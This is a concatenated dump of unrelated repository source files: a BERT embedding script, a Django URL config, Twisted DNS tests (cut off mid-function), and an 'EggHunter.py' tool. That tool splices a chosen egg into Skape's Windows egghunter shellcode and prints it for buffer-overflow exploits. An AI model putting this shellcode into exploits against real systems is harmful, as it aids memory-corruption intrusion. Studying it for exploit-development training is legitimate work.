] | permissive | cjf9028/BERT-Sentiment-Analysis-Amazon-Review | 51bece3a0580219a6495d71aa81b4c83e91a1e8b | 70b85b6e97c69e02feb4e34fdeecaef0931ab461 | refs/heads/master | 2020-04-16T02:41:40.683946 | 2018-12-28T09:18:21 | 2018-12-28T09:18:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,657 | py | # Call the command line output from here and read the output file
import subprocess,os, json
import numpy as np
# Try running command from here
p = subprocess.Popen('python extract_features_n.py --input_file="./input.txt" --output_file="./output_2.jsonl" --vocab_file="../uncased_L-12_H-768_A-12/vocab.txt" --bert_config_file="../uncased_L-12_H-768_A-12/bert_config.json" --init_checkpoint="../uncased_L-12_H-768_A-12/bert_model.ckpt" --layers=-1,-2,-3,-4 --max_seq_length=128 --batch_size=8',stdout=subprocess.PIPE, shell=True)
p.wait()
# Should be a parameter
numLayers = 2
embMode = "MAX"
numSent = 2
outputFile = "./BertVectors/SampleVec.txt"
printTokenization = 1
def handleNumLayers(numLayers,jsonObject):
if numLayers == 1:
# Take only the last 2 layers
vecSent = jsonObject['layers'][0]['values']
elif numLayers == 2:
# Take only the last 2 layers
vecSent = jsonObject['layers'][0]['values'] + jsonObject['layers'][1]['values']
elif numLayers == 3:
# Take only the last 2 layers
vecSent = jsonObject['layers'][0]['values'] + jsonObject['layers'][1]['values'] + jsonObject['layers'][2]['values']
elif numLayers == 4:
# Take only the last 2 layers
vecSent = jsonObject['layers'][0]['values'] + jsonObject['layers'][1]['values'] + jsonObject['layers'][2]['values'] + jsonObject['layers'][3]['values']
else:
print('Number of layers parameter not set to a valid value\n')
return []
return vecSent
def genSentenceEmbedding(data,embMode,numLayers):
vecSent = []
numWords = len(data['features'])
if 'linex_index' in data.keys():
line_index = data['linex_index']
elif 'line_index' in data.keys():
line_index = data['line_index']
else:
print('Line index not found')
return ""
if embMode == "SEP":
#Extract the embedding of "SEP" token -- "SEP" is the last token in each sentence
vecSentL = data['features'][numWords-1]
vecSent = handleNumLayers(numLayers,vecSentL)
elif embMode == "CLS":
vecSentL = data['features'][0]
vecSent = handleNumLayers(numLayers,vecSentL)
elif embMode == "AVG":
for index in range(1,numWords-1): # exclude the CLS & the SEP token
vecWordL = data['features'][index]
vecWordL = handleNumLayers(numLayers,vecWordL)
if index == 1:
vecSent = vecWordL
else:
vecSent = np.add(vecSent,vecWordL)
vecSent = vecSent/ (index - 2) #excluding the first and the last word
elif embMode == "MAX":
for index in range(1,numWords-1): # exclude the CLS & the SEP token
vecWordL = data['features'][index]
vecWordL = handleNumLayers(numLayers,vecWordL)
if index == 1:
vecSent = vecWordL
else:
vecSent = np.maximum(vecSent,vecWordL)
else:
print('The sentence embedding mode was not entered correctly')
# Generate the tokenized version as well
tokenized = ""
for index in range(0,numWords): #exclude the CLS & the SEP token
tokenObj = data['features'][index]
tokenized = tokenized + " " + tokenObj['token']
return vecSent, tokenized.strip(),line_index
#Open the file and process to aggregate word vectors to get the sentence vectors
print('Load the json object and write the wrapper')
with open(outputFile, encoding='utf-8',mode='w') as write_file:
with open('output_2.jsonl', encoding='utf-8') as data_file:
for line in data_file.readlines() :
data = json.loads(line)
vecSent,tokenizedSent,index = genSentenceEmbedding(data,embMode,numLayers)
print(vecSent)
print(tokenizedSent)
print(index)
id = index.split(';;')[0]
label = index.split(';;')[1]
if printTokenization == 1:
write_file.write(id + "\t" + label + "\t" + tokenizedSent + "\t" ) #" ".join(str(elem) for elem in vecSent))
else:
write_file.write(id + "\t" + label + "\t" ) #" ".join(str(elem) for elem in vecSent))
write_file.write(np.array2string(vecSent, precision=4, separator=' ',suppress_small=True))
write_file.write("\n")
#Extract the embeddings for each word
print('Options entered: 1) Sentence Embedding Mode: ' + embMode + ' 2) Layers to be considered are: ' + str(numLayers))
print('The length of the vector being output is: ' + str(len(vecSent)))
| [
"doffery20@gmail.com"
] | doffery20@gmail.com |
d489d3858f96a45be324467e1fcc25a31913bf04 | 28ad76f4f4cd22de8d2cd1680dbf4fb9beaa4d24 | /anacrowdboticscom_ana_dev_402/urls.py | 7837c47d56c39afd4e03fa971a31a704b0d186ce | [] | no_license | crowdbotics-users/anacrowdboticscom-ana-dev-402 | 956d557b11a09883b6253d4c02758587628ecaec | ceaf01839ad07ce7d086009ac48f52f1a682cf05 | refs/heads/master | 2020-04-06T16:05:26.123052 | 2018-11-14T20:11:36 | 2018-11-14T20:11:36 | 157,605,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | """anacrowdboticscom_ana_dev_402 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url('', include('home.urls')),
url(r'^accounts/', include('allauth.urls')),
url(r'^api/v1/', include('home.api.v1.urls')),
url(r'^admin/', admin.site.urls),
]
| [
"sp.gharti@gmail.com"
] | sp.gharti@gmail.com |
61a01b7451393561120c1a80afc9f002860b1ea7 | 8272f8c86ff782ba68c665dc5b50b53eb30cbafb | /Tools/EggHunter.py | 4696d2228180bdf1b08e397ea01c6b49d8633e13 | [] | no_license | R3dFruitRollUp/OSCE | 06f8764669917d1a5c6405882b3f64c81e030601 | 2996c80e53f6e824f4cfa7414e77c6e93e9118f0 | refs/heads/master | 2020-03-21T10:00:32.602423 | 2018-06-12T02:43:23 | 2018-06-12T02:43:23 | 138,429,201 | 0 | 1 | null | 2018-06-23T19:48:48 | 2018-06-23T19:48:48 | null | UTF-8 | Python | false | false | 2,036 | py | #!/usr/bin/python
import binascii
import time
import sys
# colors (*NIX systems only)
W = '\033[0m' # white
R = '\033[91m' # Light Red
G = '\033[32m' # green
M = '\033[95m' # Light magenta
# the script takes user supplied egg as input and plug it to Skape's piece of art! the output (opcode) is debugger and binary file friendly.
# Reference: "Safely Searching Process Virtual Address Space" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
# 0: 66 81 ca ff 0f or dx,0xfff
# 5: 42 inc edx
# 6: 52 push edx
# 7: 6a 02 push 0x2
# 9: 58 pop eax
# a: cd 2e int 0x2e
# c: 3c 05 cmp al,0x5
# e: 5a pop edx
# f: 74 ef je 0x0
# 11: b8 54 30 30 57 mov eax,0x57303054 egg = "T00W"
# 16: 8b fa mov edi,edx
# 18: af scas eax,DWORD PTR es:[edi]
# 19: 75 ea jne 0x5
# 1b: af scas eax,DWORD PTR es:[edi]
# 1c: 75 e7 jne 0x5
# 1e: ff e7 jmp edi
if len(sys.argv) < 2:
print "Usage: python EggHunter.py <"+G+"egg"+W+">"
sys.exit(0)
Input = str(sys.argv[1])
Egg = binascii.hexlify(Input)
Egg = list(Egg)
OpCode = Egg[6]+Egg[7]+Egg[4]+Egg[5]+Egg[2]+Egg[3]+Egg[0]+Egg[1]
Shellcode = "\\x"+Egg[6]+Egg[7]+"\\x"+Egg[4]+Egg[5]+"\\x"+Egg[2]+Egg[3]+"\\x"+Egg[0]+Egg[1]
FinalOpcode = "6681caff0f42526a0258cd2e3c055a74efb8" +M+ OpCode +W+ "8bfaaf75eaaf75e7ffe7"
FinalShellcode = "'\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8" +M+ Shellcode +W+ "\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7'"
print "["+G+"+"+W+"] Egg Hunter shellcode with egg of '"+M+Input+W+"'.."
time.sleep(1)
print R+"Final Opcode "+W+": " + FinalOpcode
print R+"Final Shellcode "+W+": " + FinalShellcode
| [
"hashem.jawad@yahoo.com"
] | hashem.jawad@yahoo.com |
db1b2374c6afaa2d2fe5ed4e597a9e4b87926cd0 | 238e46a903cf7fac4f83fa8681094bf3c417d22d | /VTK/vtk_7.1.1_x64_Release/lib/python2.7/site-packages/twisted/names/test/test_names.py | d882eefdb044c15cc6b244c74e388d368578da5e | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | baojunli/FastCAE | da1277f90e584084d461590a3699b941d8c4030b | a3f99f6402da564df87fcef30674ce5f44379962 | refs/heads/master | 2023-02-25T20:25:31.815729 | 2021-02-01T03:17:33 | 2021-02-01T03:17:33 | 268,390,180 | 1 | 0 | BSD-3-Clause | 2020-06-01T00:39:31 | 2020-06-01T00:39:31 | null | UTF-8 | Python | false | false | 36,147 | py | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for twisted.names.
"""
import socket, operator, copy
from StringIO import StringIO
from functools import partial, reduce
from twisted.trial import unittest
from twisted.internet import reactor, defer, error
from twisted.internet.defer import succeed
from twisted.names import client, server, common, authority, dns
from twisted.names.dns import Message
from twisted.names.error import DomainError
from twisted.names.client import Resolver
from twisted.names.secondary import (
SecondaryAuthorityService, SecondaryAuthority)
from twisted.test.proto_helpers import StringTransport, MemoryReactorClock
def justPayload(results):
return [r.payload for r in results[0]]
class NoFileAuthority(authority.FileAuthority):
def __init__(self, soa, records):
# Yes, skip FileAuthority
common.ResolverBase.__init__(self)
self.soa, self.records = soa, records
soa_record = dns.Record_SOA(
mname = 'test-domain.com',
rname = 'root.test-domain.com',
serial = 100,
refresh = 1234,
minimum = 7654,
expire = 19283784,
retry = 15,
ttl=1
)
reverse_soa = dns.Record_SOA(
mname = '93.84.28.in-addr.arpa',
rname = '93.84.28.in-addr.arpa',
serial = 120,
refresh = 54321,
minimum = 382,
expire = 11193983,
retry = 30,
ttl=3
)
my_soa = dns.Record_SOA(
mname = 'my-domain.com',
rname = 'postmaster.test-domain.com',
serial = 130,
refresh = 12345,
minimum = 1,
expire = 999999,
retry = 100,
)
test_domain_com = NoFileAuthority(
soa = ('test-domain.com', soa_record),
records = {
'test-domain.com': [
soa_record,
dns.Record_A('127.0.0.1'),
dns.Record_NS('39.28.189.39'),
dns.Record_SPF('v=spf1 mx/30 mx:example.org/30 -all'),
dns.Record_SPF('v=spf1 +mx a:\0colo', '.example.com/28 -all not valid'),
dns.Record_MX(10, 'host.test-domain.com'),
dns.Record_HINFO(os='Linux', cpu='A Fast One, Dontcha know'),
dns.Record_CNAME('canonical.name.com'),
dns.Record_MB('mailbox.test-domain.com'),
dns.Record_MG('mail.group.someplace'),
dns.Record_TXT('A First piece of Text', 'a SecoNd piece'),
dns.Record_A6(0, 'ABCD::4321', ''),
dns.Record_A6(12, '0:0069::0', 'some.network.tld'),
dns.Record_A6(8, '0:5634:1294:AFCB:56AC:48EF:34C3:01FF', 'tra.la.la.net'),
dns.Record_TXT('Some more text, haha! Yes. \0 Still here?'),
dns.Record_MR('mail.redirect.or.whatever'),
dns.Record_MINFO(rmailbx='r mail box', emailbx='e mail box'),
dns.Record_AFSDB(subtype=1, hostname='afsdb.test-domain.com'),
dns.Record_RP(mbox='whatever.i.dunno', txt='some.more.text'),
dns.Record_WKS('12.54.78.12', socket.IPPROTO_TCP,
'\x12\x01\x16\xfe\xc1\x00\x01'),
dns.Record_NAPTR(100, 10, "u", "sip+E2U",
"!^.*$!sip:information@domain.tld!"),
dns.Record_AAAA('AF43:5634:1294:AFCB:56AC:48EF:34C3:01FF')],
'http.tcp.test-domain.com': [
dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool')
],
'host.test-domain.com': [
dns.Record_A('123.242.1.5'),
dns.Record_A('0.255.0.255'),
],
'host-two.test-domain.com': [
#
# Python bug
# dns.Record_A('255.255.255.255'),
#
dns.Record_A('255.255.255.254'),
dns.Record_A('0.0.0.0')
],
'cname.test-domain.com': [
dns.Record_CNAME('test-domain.com')
],
'anothertest-domain.com': [
dns.Record_A('1.2.3.4')],
}
)
reverse_domain = NoFileAuthority(
soa = ('93.84.28.in-addr.arpa', reverse_soa),
records = {
'123.93.84.28.in-addr.arpa': [
dns.Record_PTR('test.host-reverse.lookup.com'),
reverse_soa
]
}
)
my_domain_com = NoFileAuthority(
soa = ('my-domain.com', my_soa),
records = {
'my-domain.com': [
my_soa,
dns.Record_A('1.2.3.4', ttl='1S'),
dns.Record_NS('ns1.domain', ttl='2M'),
dns.Record_NS('ns2.domain', ttl='3H'),
dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool', ttl='4D')
]
}
)
class ServerDNSTestCase(unittest.TestCase):
"""
Test cases for DNS server and client.
"""
def setUp(self):
self.factory = server.DNSServerFactory([
test_domain_com, reverse_domain, my_domain_com
], verbose=2)
p = dns.DNSDatagramProtocol(self.factory)
while 1:
listenerTCP = reactor.listenTCP(0, self.factory, interface="127.0.0.1")
# It's simpler to do the stop listening with addCleanup,
# even though we might not end up using this TCP port in
# the test (if the listenUDP below fails). Cleaning up
# this TCP port sooner than "cleanup time" would mean
# adding more code to keep track of the Deferred returned
# by stopListening.
self.addCleanup(listenerTCP.stopListening)
port = listenerTCP.getHost().port
try:
listenerUDP = reactor.listenUDP(port, p, interface="127.0.0.1")
except error.CannotListenError:
pass
else:
self.addCleanup(listenerUDP.stopListening)
break
self.listenerTCP = listenerTCP
self.listenerUDP = listenerUDP
self.resolver = client.Resolver(servers=[('127.0.0.1', port)])
def tearDown(self):
"""
Clean up any server connections associated with the
L{DNSServerFactory} created in L{setUp}
"""
# It'd be great if DNSServerFactory had a method that
# encapsulated this task. At least the necessary data is
# available, though.
for conn in self.factory.connections[:]:
conn.transport.loseConnection()
def namesTest(self, querying, expectedRecords):
"""
Assert that the DNS response C{querying} will eventually fire with
contains exactly a certain collection of records.
@param querying: A L{Deferred} returned from one of the DNS client
I{lookup} methods.
@param expectedRecords: A L{list} of L{IRecord} providers which must be
in the response or the test will be failed.
@return: A L{Deferred} that fires when the assertion has been made. It
fires with a success result if the assertion succeeds and with a
L{Failure} if it fails.
"""
def checkResults(response):
receivedRecords = justPayload(response)
self.assertEqual(set(expectedRecords), set(receivedRecords))
querying.addCallback(checkResults)
return querying
def testAddressRecord1(self):
"""Test simple DNS 'A' record queries"""
return self.namesTest(
self.resolver.lookupAddress('test-domain.com'),
[dns.Record_A('127.0.0.1', ttl=19283784)]
)
def testAddressRecord2(self):
"""Test DNS 'A' record queries with multiple answers"""
return self.namesTest(
self.resolver.lookupAddress('host.test-domain.com'),
[dns.Record_A('123.242.1.5', ttl=19283784), dns.Record_A('0.255.0.255', ttl=19283784)]
)
def testAddressRecord3(self):
"""Test DNS 'A' record queries with edge cases"""
return self.namesTest(
self.resolver.lookupAddress('host-two.test-domain.com'),
[dns.Record_A('255.255.255.254', ttl=19283784), dns.Record_A('0.0.0.0', ttl=19283784)]
)
def testAuthority(self):
"""Test DNS 'SOA' record queries"""
return self.namesTest(
self.resolver.lookupAuthority('test-domain.com'),
[soa_record]
)
def test_mailExchangeRecord(self):
"""
The DNS client can issue an MX query and receive a response including
an MX record as well as any A record hints.
"""
return self.namesTest(
self.resolver.lookupMailExchange(b"test-domain.com"),
[dns.Record_MX(10, b"host.test-domain.com", ttl=19283784),
dns.Record_A(b"123.242.1.5", ttl=19283784),
dns.Record_A(b"0.255.0.255", ttl=19283784)])
def testNameserver(self):
"""Test DNS 'NS' record queries"""
return self.namesTest(
self.resolver.lookupNameservers('test-domain.com'),
[dns.Record_NS('39.28.189.39', ttl=19283784)]
)
def testHINFO(self):
"""Test DNS 'HINFO' record queries"""
return self.namesTest(
self.resolver.lookupHostInfo('test-domain.com'),
[dns.Record_HINFO(os='Linux', cpu='A Fast One, Dontcha know', ttl=19283784)]
)
def testPTR(self):
"""Test DNS 'PTR' record queries"""
return self.namesTest(
self.resolver.lookupPointer('123.93.84.28.in-addr.arpa'),
[dns.Record_PTR('test.host-reverse.lookup.com', ttl=11193983)]
)
def testCNAME(self):
"""Test DNS 'CNAME' record queries"""
return self.namesTest(
self.resolver.lookupCanonicalName('test-domain.com'),
[dns.Record_CNAME('canonical.name.com', ttl=19283784)]
)
def testMB(self):
"""Test DNS 'MB' record queries"""
return self.namesTest(
self.resolver.lookupMailBox('test-domain.com'),
[dns.Record_MB('mailbox.test-domain.com', ttl=19283784)]
)
def testMG(self):
"""Test DNS 'MG' record queries"""
return self.namesTest(
self.resolver.lookupMailGroup('test-domain.com'),
[dns.Record_MG('mail.group.someplace', ttl=19283784)]
)
def testMR(self):
"""Test DNS 'MR' record queries"""
return self.namesTest(
self.resolver.lookupMailRename('test-domain.com'),
[dns.Record_MR('mail.redirect.or.whatever', ttl=19283784)]
)
def testMINFO(self):
"""Test DNS 'MINFO' record queries"""
return self.namesTest(
self.resolver.lookupMailboxInfo('test-domain.com'),
[dns.Record_MINFO(rmailbx='r mail box', emailbx='e mail box', ttl=19283784)]
)
def testSRV(self):
"""Test DNS 'SRV' record queries"""
return self.namesTest(
self.resolver.lookupService('http.tcp.test-domain.com'),
[dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool', ttl=19283784)]
)
def testAFSDB(self):
"""Test DNS 'AFSDB' record queries"""
return self.namesTest(
self.resolver.lookupAFSDatabase('test-domain.com'),
[dns.Record_AFSDB(subtype=1, hostname='afsdb.test-domain.com', ttl=19283784)]
)
def testRP(self):
"""Test DNS 'RP' record queries"""
return self.namesTest(
self.resolver.lookupResponsibility('test-domain.com'),
[dns.Record_RP(mbox='whatever.i.dunno', txt='some.more.text', ttl=19283784)]
)
def testTXT(self):
"""Test DNS 'TXT' record queries"""
return self.namesTest(
self.resolver.lookupText('test-domain.com'),
[dns.Record_TXT('A First piece of Text', 'a SecoNd piece', ttl=19283784),
dns.Record_TXT('Some more text, haha! Yes. \0 Still here?', ttl=19283784)]
)
def test_spf(self):
"""
L{DNSServerFactory} can serve I{SPF} resource records.
"""
return self.namesTest(
self.resolver.lookupSenderPolicy('test-domain.com'),
[dns.Record_SPF('v=spf1 mx/30 mx:example.org/30 -all', ttl=19283784),
dns.Record_SPF('v=spf1 +mx a:\0colo', '.example.com/28 -all not valid', ttl=19283784)]
)
def testWKS(self):
"""Test DNS 'WKS' record queries"""
return self.namesTest(
self.resolver.lookupWellKnownServices('test-domain.com'),
[dns.Record_WKS('12.54.78.12', socket.IPPROTO_TCP, '\x12\x01\x16\xfe\xc1\x00\x01', ttl=19283784)]
)
def testSomeRecordsWithTTLs(self):
result_soa = copy.copy(my_soa)
result_soa.ttl = my_soa.expire
return self.namesTest(
self.resolver.lookupAllRecords('my-domain.com'),
[result_soa,
dns.Record_A('1.2.3.4', ttl='1S'),
dns.Record_NS('ns1.domain', ttl='2M'),
dns.Record_NS('ns2.domain', ttl='3H'),
dns.Record_SRV(257, 16383, 43690, 'some.other.place.fool', ttl='4D')]
)
def testAAAA(self):
"""Test DNS 'AAAA' record queries (IPv6)"""
return self.namesTest(
self.resolver.lookupIPV6Address('test-domain.com'),
[dns.Record_AAAA('AF43:5634:1294:AFCB:56AC:48EF:34C3:01FF', ttl=19283784)]
)
def testA6(self):
"""Test DNS 'A6' record queries (IPv6)"""
return self.namesTest(
self.resolver.lookupAddress6('test-domain.com'),
[dns.Record_A6(0, 'ABCD::4321', '', ttl=19283784),
dns.Record_A6(12, '0:0069::0', 'some.network.tld', ttl=19283784),
dns.Record_A6(8, '0:5634:1294:AFCB:56AC:48EF:34C3:01FF', 'tra.la.la.net', ttl=19283784)]
)
def test_zoneTransfer(self):
"""
Test DNS 'AXFR' queries (Zone transfer)
"""
default_ttl = soa_record.expire
results = [copy.copy(r) for r in reduce(operator.add, test_domain_com.records.values())]
for r in results:
if r.ttl is None:
r.ttl = default_ttl
return self.namesTest(
self.resolver.lookupZone('test-domain.com').addCallback(lambda r: (r[0][:-1],)),
results
)
def testSimilarZonesDontInterfere(self):
"""Tests that unrelated zones don't mess with each other."""
return self.namesTest(
self.resolver.lookupAddress("anothertest-domain.com"),
[dns.Record_A('1.2.3.4', ttl=19283784)]
)
def test_NAPTR(self):
"""
Test DNS 'NAPTR' record queries.
"""
return self.namesTest(
self.resolver.lookupNamingAuthorityPointer('test-domain.com'),
[dns.Record_NAPTR(100, 10, "u", "sip+E2U",
"!^.*$!sip:information@domain.tld!",
ttl=19283784)])
class HelperTestCase(unittest.TestCase):
def testSerialGenerator(self):
f = self.mktemp()
a = authority.getSerial(f)
for i in range(20):
b = authority.getSerial(f)
self.assertTrue(a < b)
a = b
class AXFRTest(unittest.TestCase):
def setUp(self):
self.results = None
self.d = defer.Deferred()
self.d.addCallback(self._gotResults)
self.controller = client.AXFRController('fooby.com', self.d)
self.soa = dns.RRHeader(name='fooby.com', type=dns.SOA, cls=dns.IN, ttl=86400, auth=False,
payload=dns.Record_SOA(mname='fooby.com',
rname='hooj.fooby.com',
serial=100,
refresh=200,
retry=300,
expire=400,
minimum=500,
ttl=600))
self.records = [
self.soa,
dns.RRHeader(name='fooby.com', type=dns.NS, cls=dns.IN, ttl=700, auth=False,
payload=dns.Record_NS(name='ns.twistedmatrix.com', ttl=700)),
dns.RRHeader(name='fooby.com', type=dns.MX, cls=dns.IN, ttl=700, auth=False,
payload=dns.Record_MX(preference=10, exchange='mail.mv3d.com', ttl=700)),
dns.RRHeader(name='fooby.com', type=dns.A, cls=dns.IN, ttl=700, auth=False,
payload=dns.Record_A(address='64.123.27.105', ttl=700)),
self.soa
]
def _makeMessage(self):
# hooray they all have the same message format
return dns.Message(id=999, answer=1, opCode=0, recDes=0, recAv=1, auth=1, rCode=0, trunc=0, maxSize=0)
def testBindAndTNamesStyle(self):
# Bind style = One big single message
m = self._makeMessage()
m.queries = [dns.Query('fooby.com', dns.AXFR, dns.IN)]
m.answers = self.records
self.controller.messageReceived(m, None)
self.assertEqual(self.results, self.records)
def _gotResults(self, result):
self.results = result
def testDJBStyle(self):
# DJB style = message per record
records = self.records[:]
while records:
m = self._makeMessage()
m.queries = [] # DJB *doesn't* specify any queries.. hmm..
m.answers = [records.pop(0)]
self.controller.messageReceived(m, None)
self.assertEqual(self.results, self.records)
class ResolvConfHandling(unittest.TestCase):
def testMissing(self):
resolvConf = self.mktemp()
r = client.Resolver(resolv=resolvConf)
self.assertEqual(r.dynServers, [('127.0.0.1', 53)])
r._parseCall.cancel()
def testEmpty(self):
resolvConf = self.mktemp()
fObj = file(resolvConf, 'w')
fObj.close()
r = client.Resolver(resolv=resolvConf)
self.assertEqual(r.dynServers, [('127.0.0.1', 53)])
r._parseCall.cancel()
class AuthorityTests(unittest.TestCase):
"""
Tests for the basic response record selection code in L{FileAuthority}
(independent of its fileness).
"""
def test_domainErrorForNameWithCommonSuffix(self):
"""
L{FileAuthority} lookup methods errback with L{DomainError} if
the requested C{name} shares a common suffix with its zone but
is not actually a descendant of its zone, in terms of its
sequence of DNS name labels. eg www.the-example.com has
nothing to do with the zone example.com.
"""
testDomain = test_domain_com
testDomainName = 'nonexistent.prefix-' + testDomain.soa[0]
f = self.failureResultOf(testDomain.lookupAddress(testDomainName))
self.assertIsInstance(f.value, DomainError)
def test_recordMissing(self):
"""
If a L{FileAuthority} has a zone which includes an I{NS} record for a
particular name and that authority is asked for another record for the
same name which does not exist, the I{NS} record is not included in the
authority section of the response.
"""
authority = NoFileAuthority(
soa=(str(soa_record.mname), soa_record),
records={
str(soa_record.mname): [
soa_record,
dns.Record_NS('1.2.3.4'),
]})
d = authority.lookupAddress(str(soa_record.mname))
result = []
d.addCallback(result.append)
answer, authority, additional = result[0]
self.assertEqual(answer, [])
self.assertEqual(
authority, [
dns.RRHeader(
str(soa_record.mname), soa_record.TYPE,
ttl=soa_record.expire, payload=soa_record,
auth=True)])
self.assertEqual(additional, [])
def _referralTest(self, method):
"""
Create an authority and make a request against it. Then verify that the
result is a referral, including no records in the answers or additional
sections, but with an I{NS} record in the authority section.
"""
subdomain = 'example.' + str(soa_record.mname)
nameserver = dns.Record_NS('1.2.3.4')
authority = NoFileAuthority(
soa=(str(soa_record.mname), soa_record),
records={
subdomain: [
nameserver,
]})
d = getattr(authority, method)(subdomain)
answer, authority, additional = self.successResultOf(d)
self.assertEqual(answer, [])
self.assertEqual(
authority, [dns.RRHeader(
subdomain, dns.NS, ttl=soa_record.expire,
payload=nameserver, auth=False)])
self.assertEqual(additional, [])
def test_referral(self):
"""
When an I{NS} record is found for a child zone, it is included in the
authority section of the response. It is marked as non-authoritative if
the authority is not also authoritative for the child zone (RFC 2181,
section 6.1).
"""
self._referralTest('lookupAddress')
def test_allRecordsReferral(self):
"""
A referral is also generated for a request of type C{ALL_RECORDS}.
"""
self._referralTest('lookupAllRecords')
class AdditionalProcessingTests(unittest.TestCase):
"""
Tests for L{FileAuthority}'s additional processing for those record types
which require it (MX, CNAME, etc).
"""
_A = dns.Record_A(b"10.0.0.1")
_AAAA = dns.Record_AAAA(b"f080::1")
def _lookupSomeRecords(self, method, soa, makeRecord, target, addresses):
"""
Perform a DNS lookup against a L{FileAuthority} configured with records
as defined by C{makeRecord} and C{addresses}.
@param method: The name of the lookup method to use; for example,
C{"lookupNameservers"}.
@type method: L{str}
@param soa: A L{Record_SOA} for the zone for which the L{FileAuthority}
is authoritative.
@param makeRecord: A one-argument callable which accepts a name and
returns an L{IRecord} provider. L{FileAuthority} is constructed
with this record. The L{FileAuthority} is queried for a record of
the resulting type with the given name.
@param target: The extra name which the record returned by
C{makeRecord} will be pointed at; this is the name which might
require extra processing by the server so that all the available,
useful information is returned. For example, this is the target of
a CNAME record or the mail exchange host pointed to by an MX record.
@type target: L{bytes}
@param addresses: A L{list} of records giving addresses of C{target}.
@return: A L{Deferred} that fires with the result of the resolver
method give by C{method}.
"""
authority = NoFileAuthority(
soa=(soa.mname.name, soa),
records={
soa.mname.name: [makeRecord(target)],
target: addresses,
},
)
return getattr(authority, method)(soa_record.mname.name)
def assertRecordsMatch(self, expected, computed):
"""
Assert that the L{RRHeader} instances given by C{expected} and
C{computed} carry all the same information but without requiring the
records appear in the same order.
@param expected: A L{list} of L{RRHeader} instances giving the expected
records.
@param computed: A L{list} of L{RRHeader} instances giving the records
computed by the scenario under test.
@raise self.failureException: If the two collections of records disagree.
"""
# RRHeader instances aren't inherently ordered. Impose an ordering
# that's good enough for the purposes of these tests - in which we
# never have more than one record of a particular type.
key = lambda rr: rr.type
self.assertEqual(sorted(expected, key=key), sorted(computed, key=key))
def _additionalTest(self, method, makeRecord, addresses):
"""
Verify that certain address records are included in the I{additional}
section of a response generated by L{FileAuthority}.
@param method: See L{_lookupSomeRecords}
@param makeRecord: See L{_lookupSomeRecords}
@param addresses: A L{list} of L{IRecord} providers which the
I{additional} section of the response is required to match
(ignoring order).
@raise self.failureException: If the I{additional} section of the
response consists of different records than those given by
C{addresses}.
"""
target = b"mail." + soa_record.mname.name
d = self._lookupSomeRecords(
method, soa_record, makeRecord, target, addresses)
answer, authority, additional = self.successResultOf(d)
self.assertRecordsMatch(
[dns.RRHeader(
target, address.TYPE, ttl=soa_record.expire, payload=address,
auth=True)
for address in addresses],
additional)
def _additionalMXTest(self, addresses):
"""
Verify that a response to an MX query has certain records in the
I{additional} section.
@param addresses: See C{_additionalTest}
"""
self._additionalTest(
"lookupMailExchange", partial(dns.Record_MX, 10), addresses)
def test_mailExchangeAdditionalA(self):
"""
If the name of the MX response has A records, they are included in the
additional section of the response.
"""
self._additionalMXTest([self._A])
def test_mailExchangeAdditionalAAAA(self):
"""
If the name of the MX response has AAAA records, they are included in
the additional section of the response.
"""
self._additionalMXTest([self._AAAA])
def test_mailExchangeAdditionalBoth(self):
"""
If the name of the MX response has both A and AAAA records, they are
all included in the additional section of the response.
"""
self._additionalMXTest([self._A, self._AAAA])
def _additionalNSTest(self, addresses):
"""
Verify that a response to an NS query has certain records in the
I{additional} section.
@param addresses: See C{_additionalTest}
"""
self._additionalTest(
"lookupNameservers", dns.Record_NS, addresses)
def test_nameserverAdditionalA(self):
"""
If the name of the NS response has A records, they are included in the
additional section of the response.
"""
self._additionalNSTest([self._A])
def test_nameserverAdditionalAAAA(self):
"""
If the name of the NS response has AAAA records, they are included in
the additional section of the response.
"""
self._additionalNSTest([self._AAAA])
def test_nameserverAdditionalBoth(self):
"""
If the name of the NS response has both A and AAAA records, they are
all included in the additional section of the response.
"""
self._additionalNSTest([self._A, self._AAAA])
def _answerCNAMETest(self, addresses):
"""
Verify that a response to a CNAME query has certain records in the
I{answer} section.
@param addresses: See C{_additionalTest}
"""
target = b"www." + soa_record.mname.name
d = self._lookupSomeRecords(
"lookupCanonicalName", soa_record, dns.Record_CNAME, target,
addresses)
answer, authority, additional = self.successResultOf(d)
alias = dns.RRHeader(
soa_record.mname.name, dns.CNAME, ttl=soa_record.expire,
payload=dns.Record_CNAME(target), auth=True)
self.assertRecordsMatch(
[dns.RRHeader(
target, address.TYPE, ttl=soa_record.expire, payload=address,
auth=True)
for address in addresses] + [alias],
answer)
def test_canonicalNameAnswerA(self):
"""
If the name of the CNAME response has A records, they are included in
the answer section of the response.
"""
self._answerCNAMETest([self._A])
def test_canonicalNameAnswerAAAA(self):
"""
If the name of the CNAME response has AAAA records, they are included
in the answer section of the response.
"""
self._answerCNAMETest([self._AAAA])
def test_canonicalNameAnswerBoth(self):
"""
If the name of the CNAME response has both A and AAAA records, they are
all included in the answer section of the response.
"""
self._answerCNAMETest([self._A, self._AAAA])
class NoInitialResponseTestCase(unittest.TestCase):
def test_no_answer(self):
"""
If a request returns a L{dns.NS} response, but we can't connect to the
given server, the request fails with the error returned at connection.
"""
def query(self, *args):
# Pop from the message list, so that it blows up if more queries
# are run than expected.
return succeed(messages.pop(0))
def queryProtocol(self, *args, **kwargs):
